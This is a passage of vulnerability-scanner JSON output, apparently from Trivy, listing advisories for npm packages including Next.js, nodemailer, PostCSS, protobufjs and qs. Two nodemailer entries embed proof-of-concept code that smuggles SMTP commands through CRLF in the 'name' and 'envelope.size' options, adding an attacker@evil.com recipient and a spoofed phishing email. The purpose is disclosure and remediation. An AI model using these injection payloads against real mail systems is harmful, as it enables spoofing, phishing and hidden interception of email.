"https://github.com/vercel/next.js/security/advisories/GHSA-3g8h-86w9-wvmq", "https://nvd.nist.gov/vuln/detail/CVE-2026-44572", "https://www.cve.org/CVERecord?id=CVE-2026-44572" ], "PublishedDate": "2026-05-13T16:16:58.8Z", "LastModifiedDate": "2026-05-15T15:46:08.98Z" }, { "VulnerabilityID": "CVE-2026-44582", "VendorIDs": [ "GHSA-vfv6-92ff-j949" ], "PkgID": "next@14.2.3", "PkgName": "next", "PkgIdentifier": { "PURL": "pkg:npm/next@14.2.3", "UID": "2c2120133d592351" }, "InstalledVersion": "14.2.3", "FixedVersion": "15.5.16, 16.2.5", "Status": "fixed", "SeveritySource": "ghsa", "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-44582", "DataSource": { "ID": "ghsa", "Name": "GitHub Security Advisory npm", "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" }, "Fingerprint": "sha256:9773022fe1a5494682b527d0189974a0089850cae0893dbe88b5b564a864dccc", "Title": "Next.js: Next.js: Cache poisoning allows incorrect response delivery", "Description": "Next.js is a React framework for building full-stack web applications. From 13.4.6 to before 15.5.16 and 16.2.5, React Server Component responses can be vulnerable to cache poisoning in deployments that rely on shared caches with insufficient response partitioning. In affected conditions, collisions in the _rsc cache-busting value can allow an attacker to poison cache entries so users receive the wrong response variant for a given URL. This vulnerability is fixed in 15.5.16 and 16.2.5.", "Severity": "LOW", "CweIDs": [ "CWE-328" ], "VendorSeverity": { "ghsa": 1, "redhat": 1 }, "CVSS": { "ghsa": { "V3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N", "V3Score": 3.7 }, "redhat": { "V3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N", "V3Score": 3.7 } }, "References": [ "https://access.redhat.com/security/cve/CVE-2026-44582", "https://github.com/vercel/next.js", "https://github.com/vercel/next.js/releases/tag/v15.5.16", "https://github.com/vercel/next.js/releases/tag/v16.2.5", "https://github.com/vercel/next.js/security/advisories/GHSA-vfv6-92ff-j949", "https://nvd.nist.gov/vuln/detail/CVE-2026-44582", "https://www.cve.org/CVERecord?id=CVE-2026-44582" ], "PublishedDate": "2026-05-13T18:16:19.037Z", "LastModifiedDate": "2026-05-14T18:15:03.26Z" }, { "VulnerabilityID": "CVE-2025-14874", "VendorIDs": [ "GHSA-rcmh-qjqh-p98v" ], "PkgID": "nodemailer@6.10.1", "PkgName": "nodemailer", "PkgIdentifier": { "PURL": "pkg:npm/nodemailer@6.10.1", "UID": "cdb0ca30dd5d0b41" }, "InstalledVersion": "6.10.1", "FixedVersion": "7.0.11", "Status": "fixed", "SeveritySource": "ghsa", "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2025-14874", "DataSource": { "ID": "ghsa", "Name": "GitHub Security Advisory npm", "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" }, "Fingerprint": "sha256:14e993e0b9da6a7dbb55df599d9ed1c1b9e95e77ffbbd18eadd3c2971b5b035b", "Title": "nodemailer: Nodemailer: Denial of service via crafted email address header", "Description": "A flaw was found in Nodemailer. This vulnerability allows a denial of service (DoS) via a crafted email address header that triggers infinite recursion in the address parser.", "Severity": "HIGH", "CweIDs": [ "CWE-703" ], "VendorSeverity": { "ghsa": 3, "nvd": 3, "redhat": 2 }, "CVSS": { "ghsa": { "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "V3Score": 7.5 }, "nvd": { "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "V3Score": 7.5 }, "redhat": { "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "V3Score": 7.5 } }, "References": [ "https://access.redhat.com/security/cve/CVE-2025-14874", "https://bugzilla.redhat.com/show_bug.cgi?id=2418133", "https://github.com/nodemailer/nodemailer", "https://github.com/nodemailer/nodemailer/commit/b61b9c0cfd682b6f647754ca338373b68336a150", "https://github.com/nodemailer/nodemailer/security/advisories/GHSA-rcmh-qjqh-p98v", "https://nvd.nist.gov/vuln/detail/CVE-2025-14874", "https://www.cve.org/CVERecord?id=CVE-2025-14874" ], "PublishedDate": "2025-12-18T09:15:44.87Z", "LastModifiedDate": "2026-01-08T03:15:43.19Z" }, { "VulnerabilityID": "CVE-2025-13033", "VendorIDs": [ "GHSA-mm7p-fcc7-pg87" ], "PkgID": "nodemailer@6.10.1", "PkgName": "nodemailer", "PkgIdentifier": { "PURL": "pkg:npm/nodemailer@6.10.1", "UID": "cdb0ca30dd5d0b41" }, "InstalledVersion": "6.10.1", "FixedVersion": "7.0.7", "Status": "fixed", "SeveritySource": "ghsa", "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2025-13033", "DataSource": { "ID": "ghsa", "Name": "GitHub Security Advisory npm", "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" }, "Fingerprint": "sha256:ada016a78e88a43dce5a673f50c91305b8b0e92a236fe8438202fe49d8eef6df", "Title": "nodemailer: Nodemailer: Email to an unintended domain can occur due to Interpretation Conflict", "Description": "A vulnerability was identified in the email parsing library due to improper handling of specially formatted recipient email addresses. An attacker can exploit this flaw by crafting a recipient address that embeds an external address within quotes. This causes the application to misdirect the email to the attacker's external address instead of the intended internal recipient. This could lead to a significant data leak of sensitive information and allow an attacker to bypass security filters and access controls.", "Severity": "MEDIUM", "CweIDs": [ "CWE-1286" ], "VendorSeverity": { "ghsa": 2, "redhat": 2 }, "CVSS": { "ghsa": { "V40Vector": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P", "V40Score": 5.5 }, "redhat": { "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "V3Score": 7.5 } }, "References": [ "https://access.redhat.com/errata/RHSA-2026:15979", "https://access.redhat.com/errata/RHSA-2026:3751", "https://access.redhat.com/security/cve/CVE-2025-13033", "https://bugzilla.redhat.com/show_bug.cgi?id=2402179", "https://github.com/nodemailer/nodemailer", "https://github.com/nodemailer/nodemailer/commit/1150d99fba77280df2cfb1885c43df23109a8626", "https://github.com/nodemailer/nodemailer/security/advisories/GHSA-mm7p-fcc7-pg87", "https://nvd.nist.gov/vuln/detail/CVE-2025-13033", "https://www.cve.org/CVERecord?id=CVE-2025-13033" ], "PublishedDate": "2025-11-14T20:15:45.957Z", "LastModifiedDate": "2026-05-11T13:16:10.037Z" }, { "VulnerabilityID": "GHSA-vvjj-xcjg-gr5g", "PkgID": "nodemailer@6.10.1", "PkgName": "nodemailer", "PkgIdentifier": { "PURL": "pkg:npm/nodemailer@6.10.1", "UID": "cdb0ca30dd5d0b41" }, "InstalledVersion": "6.10.1", "FixedVersion": "8.0.5", "Status": "fixed", "SeveritySource": "ghsa", "PrimaryURL": "https://github.com/advisories/GHSA-vvjj-xcjg-gr5g", "DataSource": { "ID": "ghsa", "Name": "GitHub Security Advisory npm", "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" }, "Fingerprint": "sha256:a2587fc053d7b7cc734a99890197c9e0e37a8bb9038ceabd2cb85d53bc6a1b62", "Title": "Nodemailer Vulnerable to SMTP Command Injection via CRLF in Transport name Option (EHLO/HELO) ", "Description": "### Summary\n\nNodemailer versions up to and including 8.0.4 are vulnerable to SMTP command injection via CRLF sequences in the transport `name` configuration option. The `name` value is used directly in the EHLO/HELO SMTP command without any sanitization for carriage return and line feed characters (`\\r\\n`). An attacker who can influence this option can inject arbitrary SMTP commands, enabling unauthorized email sending, email spoofing, and phishing attacks.\n\n### Details\n\nThe vulnerability exists in `lib/smtp-connection/index.js`. When establishing an SMTP connection, the `name` option is concatenated directly into the EHLO command:\n\n```javascript\n// lib/smtp-connection/index.js, line 71\nthis.name = this.options.name || this._getHostname();\n\n// line 1336\nthis._sendCommand('EHLO ' + this.name);\n```\n\nThe `_sendCommand` method writes the string directly to the socket followed by `\\r\\n` (line 1082):\n\n```javascript\nthis._socket.write(Buffer.from(str + '\\r\\n', 'utf-8'));\n```\n\nIf the `name` option contains `\\r\\n` sequences, each injected line is interpreted by the SMTP server as a separate command. Unlike the `envelope.from` and `envelope.to` fields which are validated for `\\r\\n` (line 1107-1119), and unlike `envelope.size` which was recently fixed (GHSA-c7w3-x93f-qmm8) by casting to a number, the `name` parameter receives no CRLF sanitization whatsoever.\n\nThis is distinct from the previously reported GHSA-c7w3-x93f-qmm8 (envelope.size injection) as it affects a different parameter (`name` vs `size`), uses a different injection point (EHLO command vs MAIL FROM command), and occurs at connection initialization rather than during message sending.\n\nThe `name` option is also used in HELO (line 1384) and LHLO (line 1333) commands with the same lack of sanitization.\n\n### PoC\n\n```javascript\nconst nodemailer = require('nodemailer');\nconst net = require('net');\n\n// Simple SMTP server to observe injected commands\nconst server = net.createServer(socket =\u003e {\n socket.write('220 test ESMTP\\r\\n');\n socket.on('data', data =\u003e {\n const lines = data.toString().split('\\r\\n').filter(l =\u003e l);\n lines.forEach(line =\u003e {\n console.log('SMTP CMD:', line);\n if (line.startsWith('EHLO') || line.startsWith('HELO'))\n socket.write('250 OK\\r\\n');\n else if (line.startsWith('MAIL FROM'))\n socket.write('250 OK\\r\\n');\n else if (line.startsWith('RCPT TO'))\n socket.write('250 OK\\r\\n');\n else if (line === 'DATA')\n socket.write('354 Go\\r\\n');\n else if (line === '.')\n socket.write('250 OK\\r\\n');\n else if (line === 'QUIT')\n { socket.write('221 Bye\\r\\n'); socket.end(); }\n else if (line === 'RSET')\n socket.write('250 OK\\r\\n');\n });\n });\n});\n\nserver.listen(0, '127.0.0.1', () =\u003e {\n const port = server.address().port;\n\n // Inject a complete phishing email via EHLO name\n const transport = nodemailer.createTransport({\n host: '127.0.0.1',\n port: port,\n secure: false,\n name: 'legit.host\\r\\nMAIL FROM:\u003cattacker@evil.com\u003e\\r\\n'\n + 'RCPT TO:\u003cvictim@target.com\u003e\\r\\nDATA\\r\\n'\n + 'From: ceo@company.com\\r\\nTo: victim@target.com\\r\\n'\n + 'Subject: Urgent\\r\\n\\r\\nPhishing content\\r\\n.\\r\\nRSET'\n });\n\n transport.sendMail({\n from: 'legit@example.com',\n to: 'legit-recipient@example.com',\n subject: 'Normal email',\n text: 'Normal content'\n }, () =\u003e { server.close(); process.exit(0); });\n});\n```\n\nRunning this PoC shows the SMTP server receives the injected MAIL FROM, RCPT TO, DATA, and phishing email content as separate SMTP commands before the legitimate email is sent.\n\n### Impact\n\n**Who is affected:** Applications that allow users or external input to configure the `name` SMTP transport option. This includes:\n- Multi-tenant SaaS platforms with per-tenant SMTP configuration\n- Admin panels where SMTP hostname/name settings are stored in databases\n- Applications loading SMTP config from environment variables or external sources\n\n**What can an attacker do:**\n1. **Send unauthorized emails** to arbitrary recipients by injecting MAIL FROM and RCPT TO commands\n2. **Spoof email senders** by injecting arbitrary From headers in the DATA portion\n3. **Conduct phishing attacks** using the legitimate SMTP server as a relay\n4. **Bypass application-level controls** on email recipients, since the injected commands are processed before the application's intended MAIL FROM/RCPT TO\n5. **Perform SMTP reconnaissance** by injecting commands like VRFY or EXPN\n\nThe injection occurs at the EHLO stage (before authentication in most SMTP flows), making it particularly dangerous as the injected commands may be processed with the server's trust context.\n\n**Recommended fix:** Sanitize the `name` option by stripping or rejecting CRLF sequences, similar to how `envelope.from` and `envelope.to` are already validated on lines 1107-1119 of `lib/smtp-connection/index.js`. For example:\n\n```javascript\nthis.name = (this.options.name || this._getHostname()).replace(/[\\r\\n]/g, '');\n```", "Severity": "MEDIUM", "VendorSeverity": { "ghsa": 2 }, "CVSS": { "ghsa": { "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:H/A:N", "V3Score": 4.9 } }, "References": [ "https://github.com/nodemailer/nodemailer", "https://github.com/nodemailer/nodemailer/commit/0a43876801a420ca528f492eaa01bfc421cc306e", "https://github.com/nodemailer/nodemailer/releases/tag/v8.0.5", "https://github.com/nodemailer/nodemailer/security/advisories/GHSA-vvjj-xcjg-gr5g" ], "PublishedDate": "2026-04-08T15:05:20Z", "LastModifiedDate": "2026-04-08T15:05:20Z" }, { "VulnerabilityID": "GHSA-c7w3-x93f-qmm8", "PkgID": "nodemailer@6.10.1", "PkgName": "nodemailer", "PkgIdentifier": { "PURL": "pkg:npm/nodemailer@6.10.1", "UID": "cdb0ca30dd5d0b41" }, "InstalledVersion": "6.10.1", "FixedVersion": "8.0.4", "Status": "fixed", "SeveritySource": "ghsa", "PrimaryURL": "https://github.com/advisories/GHSA-c7w3-x93f-qmm8", "DataSource": { "ID": "ghsa", "Name": "GitHub Security Advisory npm", "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" }, "Fingerprint": "sha256:8532c98f90c743363865792f4fff2316492ca5848b2fd686194a4e1dc3c5d16b", "Title": "Nodemailer has SMTP command injection due to unsanitized `envelope.size` parameter", "Description": "### Summary\nWhen a custom `envelope` object is passed to `sendMail()` with a `size` property containing CRLF characters (`\\r\\n`), the value is concatenated directly into the SMTP `MAIL FROM` command without sanitization. This allows injection of arbitrary SMTP commands, including `RCPT TO` — silently adding attacker-controlled recipients to outgoing emails.\n\n\n### Details\nIn `lib/smtp-connection/index.js` (lines 1161-1162), the `envelope.size` value is concatenated into the SMTP `MAIL FROM` command without any CRLF sanitization:\n\n```javascript\nif (this._envelope.size \u0026\u0026 this._supportedExtensions.includes('SIZE')) {\n args.push('SIZE=' + this._envelope.size);\n}\n```\n\nThis contrasts with other envelope parameters in the same function that ARE properly sanitized:\n- **Addresses** (`from`, `to`): validated for `[\\r\\n\u003c\u003e]` at lines 1107-1127\n- **DSN parameters** (`dsn.ret`, `dsn.envid`, `dsn.orcpt`): encoded via `encodeXText()` at lines 1167-1183\n\nThe `size` property reaches this code path through `MimeNode.setEnvelope()` in `lib/mime-node/index.js` (lines 854-858), which copies all non-standard envelope properties verbatim:\n\n```javascript\nconst standardFields = ['to', 'cc', 'bcc', 'from'];\nObject.keys(envelope).forEach(key =\u003e {\n if (!standardFields.includes(key)) {\n this._envelope[key] = envelope[key];\n }\n});\n```\n\nSince `_sendCommand()` writes the command string followed by `\\r\\n` to the raw TCP socket, a CRLF in the `size` value terminates the `MAIL FROM` command and starts a new SMTP command.\n\nNote: by default, Nodemailer constructs the envelope automatically from the message's `from`/`to` fields and does not include `size`. This vulnerability requires the application to explicitly pass a custom `envelope` object with a `size` property to `sendMail()`. \nWhile this limits the attack surface, applications that expose envelope configuration to users are affected.\n\n### PoC\nave the following as `poc.js` and run with `node poc.js`:\n\n```javascript\nconst net = require('net');\nconst nodemailer = require('nodemailer');\n\n// Minimal SMTP server that logs raw commands\nconst server = net.createServer(socket =\u003e {\n socket.write('220 localhost ESMTP\\r\\n');\n let buffer = '';\n socket.on('data', chunk =\u003e {\n buffer += chunk.toString();\n const lines = buffer.split('\\r\\n');\n buffer = lines.pop();\n for (const line of lines) {\n if (!line) continue;\n console.log('C:', line);\n if (line.startsWith('EHLO')) {\n socket.write('250-localhost\\r\\n250-SIZE 10485760\\r\\n250 OK\\r\\n');\n } else if (line.startsWith('MAIL FROM')) {\n socket.write('250 OK\\r\\n');\n } else if (line.startsWith('RCPT TO')) {\n socket.write('250 OK\\r\\n');\n } else if (line === 'DATA') {\n socket.write('354 Start\\r\\n');\n } else if (line === '.') {\n socket.write('250 OK\\r\\n');\n } else if (line.startsWith('QUIT')) {\n socket.write('221 Bye\\r\\n');\n socket.end();\n }\n }\n });\n});\n\nserver.listen(0, '127.0.0.1', () =\u003e {\n const port = server.address().port;\n console.log('SMTP server on port', port);\n console.log('Sending email with injected RCPT TO...\\n');\n\n const transporter = nodemailer.createTransport({\n host: '127.0.0.1',\n port,\n secure: false,\n tls: { rejectUnauthorized: false },\n });\n\n transporter.sendMail({\n from: 'sender@example.com',\n to: 'recipient@example.com',\n subject: 'Normal email',\n text: 'This is a normal email.',\n envelope: {\n from: 'sender@example.com',\n to: ['recipient@example.com'],\n size: '100\\r\\nRCPT TO:\u003cattacker@evil.com\u003e',\n },\n }, (err) =\u003e {\n if (err) console.error('Error:', err.message);\n console.log('\\nExpected output above:');\n console.log(' C: MAIL FROM:\u003csender@example.com\u003e SIZE=100');\n console.log(' C: RCPT TO:\u003cattacker@evil.com\u003e \u003c-- INJECTED');\n console.log(' C: RCPT TO:\u003crecipient@example.com\u003e');\n server.close();\n transporter.close();\n });\n});\n```\n\n**Expected output:**\n```\nSMTP server on port 12345\nSending email with injected RCPT TO...\n\nC: EHLO [127.0.0.1]\nC: MAIL FROM:\u003csender@example.com\u003e SIZE=100\nC: RCPT TO:\u003cattacker@evil.com\u003e\nC: RCPT TO:\u003crecipient@example.com\u003e\nC: DATA\n...\nC: .\nC: QUIT\n```\n\nThe `RCPT TO:\u003cattacker@evil.com\u003e` line is injected by the CRLF in the `size` field, silently adding an extra recipient to the email.\n\n### Impact\nThis is an SMTP command injection vulnerability. An attacker who can influence the `envelope.size` property in a `sendMail()` call can:\n\n- **Silently add hidden recipients** to outgoing emails via injected `RCPT TO` commands, receiving copies of all emails sent through the affected transport\n- **Inject arbitrary SMTP commands** (e.g., `RSET`, additional `MAIL FROM` to send entirely separate emails through the server)\n- **Leverage the sending organization's SMTP server reputation** for spam or phishing delivery\n\nThe severity is mitigated by the fact that the `envelope` object must be explicitly provided by the application. Nodemailer's default envelope construction from message headers does not include `size`. Applications that pass through user-controlled data to the envelope options (e.g., via API parameters, admin panels, or template configurations) are vulnerable.\n\nAffected versions: at least v8.0.3 (current); likely all versions where `envelope.size` is supported.", "Severity": "LOW", "VendorSeverity": { "ghsa": 1 }, "CVSS": { "ghsa": { "V40Vector": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N", "V40Score": 2.3 } }, "References": [ "https://github.com/nodemailer/nodemailer", "https://github.com/nodemailer/nodemailer/commit/2d7b9710e63555a1eb13d721296c51186d4b5651", "https://github.com/nodemailer/nodemailer/security/advisories/GHSA-c7w3-x93f-qmm8" ], "PublishedDate": "2026-03-26T22:26:46Z", "LastModifiedDate": "2026-03-26T22:26:46Z" }, { "VulnerabilityID": "CVE-2026-41305", "VendorIDs": [ "GHSA-qx2v-qp2m-jg93" ], "PkgID": "postcss@8.4.31", "PkgName": "postcss", "PkgIdentifier": { "PURL": "pkg:npm/postcss@8.4.31", "UID": "ddafc079bb8c814b" }, "InstalledVersion": "8.4.31", "FixedVersion": "8.5.10", "Status": "fixed", "SeveritySource": "ghsa", "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-41305", "DataSource": { "ID": "ghsa", "Name": "GitHub Security Advisory npm", "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" }, "Fingerprint": "sha256:e437408b5e481324ac18f873baa01d129618b8a919dfd93b95377706b9f70ca4", "Title": "postcss: PostCSS: Cross-Site Scripting (XSS) via improper escaping of style closing tags", "Description": "PostCSS takes a CSS file and provides an API to analyze and modify its rules by transforming the rules into an Abstract Syntax Tree. Versions prior to 8.5.10 do not escape `\u003c/style\u003e` sequences when stringifying CSS ASTs. When user-submitted CSS is parsed and re-stringified for embedding in HTML `\u003cstyle\u003e` tags, `\u003c/style\u003e` in CSS values breaks out of the style context, enabling XSS. Version 8.5.10 fixes the issue.", "Severity": "MEDIUM", "CweIDs": [ "CWE-79" ], "VendorSeverity": { "ghsa": 2, "redhat": 2 }, "CVSS": { "ghsa": { "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "V3Score": 6.1 }, "redhat": { "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "V3Score": 6.1 } }, "References": [ "https://access.redhat.com/security/cve/CVE-2026-41305", "https://github.com/postcss/postcss", "https://github.com/postcss/postcss/releases/tag/8.5.10", "https://github.com/postcss/postcss/security/advisories/GHSA-qx2v-qp2m-jg93", "https://nvd.nist.gov/vuln/detail/CVE-2026-41305", "https://www.cve.org/CVERecord?id=CVE-2026-41305" ], "PublishedDate": "2026-04-24T03:16:11.547Z", "LastModifiedDate": "2026-04-24T17:16:21.5Z" }, { "VulnerabilityID": "CVE-2026-45740", "VendorIDs": [ "GHSA-jggg-4jg4-v7c6" ], "PkgID": "protobufjs@7.5.6", "PkgName": "protobufjs", "PkgIdentifier": { "PURL": "pkg:npm/protobufjs@7.5.6", "UID": "62e85fbdb853ebe0" }, "InstalledVersion": "7.5.6", "FixedVersion": "7.5.8, 8.2.0", "Status": "fixed", "SeveritySource": "ghsa", "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-45740", "DataSource": { "ID": "ghsa", "Name": "GitHub Security Advisory npm", "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" }, "Fingerprint": "sha256:58d50957b522636da4dbf89cb3cbb6f3d86a7848a088f8020d3ec966602ce874", "Title": "protobufjs: Denial of Service via unbounded recursive JSON descriptor expansion", "Description": "protobufjs compiles protobuf definitions into JavaScript (JS) functions. Prior to 7.5.8 and 8.2.0, protobufjs could recurse without a depth limit while expanding nested JSON descriptors through Root.fromJSON() and Namespace.addJSON(). A crafted JSON descriptor with deeply nested namespace definitions could cause the JavaScript call stack to be exhausted during descriptor loading. This vulnerability is fixed in 7.5.8 and 8.2.0.", "Severity": "MEDIUM", "CweIDs": [ "CWE-674" ], "VendorSeverity": { "ghsa": 2, "nvd": 3 }, "CVSS": { "ghsa": { "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", "V3Score": 5.3 }, "nvd": { "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "V3Score": 7.5 } }, "References": [ "https://github.com/protobufjs/protobuf.js", "https://github.com/protobufjs/protobuf.js/security/advisories/GHSA-jggg-4jg4-v7c6", "https://nvd.nist.gov/vuln/detail/CVE-2026-45740" ], "PublishedDate": "2026-05-13T16:17:00.52Z", "LastModifiedDate": "2026-05-13T20:50:15.587Z" }, { "VulnerabilityID": "CVE-2026-8723", "VendorIDs": [ "GHSA-q8mj-m7cp-5q26" ], "PkgID": "qs@6.14.2", "PkgName": "qs", "PkgIdentifier": { "PURL": "pkg:npm/qs@6.14.2", "UID": "113e3df86ddfa56f" }, "InstalledVersion": "6.14.2", "FixedVersion": "6.15.2", "Status": "fixed", "SeveritySource": "ghsa", "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-8723", "DataSource": { "ID": "ghsa", "Name": "GitHub Security Advisory npm", "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" }, "Fingerprint": "sha256:73dd6e42cc1ee95f951dd1f6878a1a80d64815ece94b0500b962fee972bc6c29", "Title": "### Summary `qs.stringify` throws `TypeError` when called with `arr ...", "Description": "### Summary\n\n\n\n`qs.stringify` throws `TypeError` when called with `arrayFormat: 'comma'` and `encodeValuesOnly: true` on an array containing `null` or `undefined`. The throw is synchronous and not handled by any of qs's null-related options (`skipNulls`, `strictNullHandling`).\n\n\n\n### Details\n\n\n\nIn the comma + `encodeValuesOnly` branch, `lib/stringify.js:145` mapped the array through the raw encoder before joining:\n\n\n\n```js\n\n\n\nobj = utils.maybeMap(obj, encoder);\n\n\n\n```\n\n\n\n`utils.encode` (`lib/utils.js:195`) reads `str.length` with no null guard, so a `null` or `undefined` element throws `TypeError`. `skipNulls` and `strictNullHandling` are both checked in the per-element loop below this line and never get a chance to run.\n\n\n\nSame class of bug as the filter-array path fixed in 0c180a4. The vulnerable shape of the comma + `encodeValuesOnly` branch was introduced in 4c4b23d (\"encode comma values more consistently\", PR #463, 2023-01-19), first released in v6.11.1.\n\n\n\n#### PoC\n\n\n\n```js\n\n\n\nconst qs = require('qs');\n\n\n\nqs.stringify({ a: [null, 'b'] }, { arrayFormat: 'comma', encodeValuesOnly: true });\n\n\n\nqs.stringify({ a: [undefined, 'b'] }, { arrayFormat: 'comma', encodeValuesOnly: true });\n\n\n\nqs.stringify({ a: [null] }, { arrayFormat: 'comma', encodeValuesOnly: true });\n\n\n\n// TypeError: Cannot read properties of null (reading 'length')\n\n\n\n// at encode (lib/utils.js:195:13)\n\n\n\n// at Object.maybeMap (lib/utils.js:322:37)\n\n\n\n// at stringify (lib/stringify.js:145:25)\n\n\n\n```\n\n\n\n#### Fix\n\n\n\n`lib/stringify.js:145`, applied in 21f80b3 on `main` and released as v6.15.2:\n\n\n\n```diff\n\n\n\n- obj = utils.maybeMap(obj, encoder);\n\n\n\n+ obj = utils.maybeMap(obj, function (v) {\n\n\n\n+ return v == null ? v : encoder(v);\n\n\n\n+ });\n\n\n\n```\n\n\n\n`null` and `undefined` now pass through `maybeMap` unchanged and reach the `join(',')` step as-is. For `{ a: [null, 'b'] }` this produces `a=,b`, matching the non-`encodeValuesOnly` comma path (which already joins before encoding and produces `a=%2Cb` for the same input). Single-element `[null]` arrays still collapse via the existing `obj.join(',') || null` and remain subject to `skipNulls` / `strictNullHandling` in the main loop.\n\n\n\n### Affected versions\n\n\n\n`\u003e=6.11.1 \u003c6.15.2` — fixed in v6.15.2.\n\n\n\nThe vulnerable code shape was introduced in 4c4b23d and first shipped in v6.11.1. Earlier versions — including all of 6.7.x, 6.8.x, 6.9.x, 6.10.x, and 6.11.0 — implemented the comma + `encodeValuesOnly` path differently (joining before encoding) and are not affected. Empirically verified across released versions.\n\n\n\n### Impact\n\n\n\nApplication code that calls `qs.stringify` with both `arrayFormat: 'comma'` and `encodeValuesOnly: true` (both non-default) on input that may contain a `null` or `undefined` array element will throw synchronously instead of producing a query string. In a typical Node.js HTTP framework (Express, Fastify, Koa, hapi) the sync throw is caught by the framework's error boundary and the affected request returns a 500; the worker process does not exit and subsequent requests are unaffected. The \"kills the worker process\" framing applies only to call sites outside a request-handler error boundary (background jobs, startup paths, stream pipelines) or to deployments with framework error handling explicitly disabled.\n\n\n\nThe vulnerable input is a `null` or `undefined` entry inside an array; this is reachable from JSON request bodies or from application code constructing arrays from user input, but not from standard HTML form submissions (which produce strings or omitted fields, not literal `null`).", "Severity": "MEDIUM", "CweIDs": [ "CWE-476" ], "VendorSeverity": { "ghsa": 2 }, "CVSS": { "ghsa": { "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", "V40Vector": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N", "V3Score": 5.3, "V40Score": 6.3 } }, "References": [ "https://github.com/ljharb/qs", "https://github.com/ljharb/qs/commit/21f80b33e5c8b3f7eba1034fff0da4a4a37a1d41", "https://github.com/ljharb/qs/security/advisories/GHSA-q8mj-m7cp-5q26", "https://nvd.nist.gov/vuln/detail/CVE-2026-8723" ], "PublishedDate": "2026-05-17T00:16:21.233Z", "LastModifiedDate": "2026-05-18T20:23:20.24Z" }, { "VulnerabilityID": "CVE-2026-8723", "VendorIDs": [ "GHSA-q8mj-m7cp-5q26" ], "PkgID": "qs@6.15.1", "PkgName": "qs", "PkgIdentifier": { "PURL": "pkg:npm/qs@6.15.1", "UID": "d72f459e7ded52a8" }, "InstalledVersion": "6.15.1", "FixedVersion": "6.15.2", "Status": "fixed", "SeveritySource": "ghsa", "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-8723", "DataSource": { "ID": "ghsa", "Name": "GitHub Security Advisory npm", "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" }, "Fingerprint": "sha256:213a1e98c629115285f987532c5bf58a832df361e42a4f606542f55356cf36c2", "Title": "### Summary `qs.stringify` throws `TypeError` when called with `arr ...", "Description": "### Summary\n\n\n\n`qs.stringify` throws `TypeError` when called with `arrayFormat: 'comma'` and `encodeValuesOnly: true` on an array containing `null` or `undefined`. The throw is synchronous and not handled by any of qs's null-related options (`skipNulls`, `strictNullHandling`).\n\n\n\n### Details\n\n\n\nIn the comma + `encodeValuesOnly` branch, `lib/stringify.js:145` mapped the array through the raw encoder before joining:\n\n\n\n```js\n\n\n\nobj = utils.maybeMap(obj, encoder);\n\n\n\n```\n\n\n\n`utils.encode` (`lib/utils.js:195`) reads `str.length` with no null guard, so a `null` or `undefined` element throws `TypeError`. `skipNulls` and `strictNullHandling` are both checked in the per-element loop below this line and never get a chance to run.\n\n\n\nSame class of bug as the filter-array path fixed in 0c180a4. The vulnerable shape of the comma + `encodeValuesOnly` branch was introduced in 4c4b23d (\"encode comma values more consistently\", PR #463, 2023-01-19), first released in v6.11.1.\n\n\n\n#### PoC\n\n\n\n```js\n\n\n\nconst qs = require('qs');\n\n\n\nqs.stringify({ a: [null, 'b'] }, { arrayFormat: 'comma', encodeValuesOnly: true });\n\n\n\nqs.stringify({ a: [undefined, 'b'] }, { arrayFormat: 'comma', encodeValuesOnly: true });\n\n\n\nqs.stringify({ a: [null] }, { arrayFormat: 'comma', encodeValuesOnly: true });\n\n\n\n// TypeError: Cannot read properties of null (reading 'length')\n\n\n\n// at encode (lib/utils.js:195:13)\n\n\n\n// at Object.maybeMap (lib/utils.js:322:37)\n\n\n\n// at stringify (lib/stringify.js:145:25)\n\n\n\n```\n\n\n\n#### Fix\n\n\n\n`lib/stringify.js:145`, applied in 21f80b3 on `main` and released as v6.15.2:\n\n\n\n```diff\n\n\n\n- obj = utils.maybeMap(obj, encoder);\n\n\n\n+ obj = utils.maybeMap(obj, function (v) {\n\n\n\n+ return v == null ? v : encoder(v);\n\n\n\n+ });\n\n\n\n```\n\n\n\n`null` and `undefined` now pass 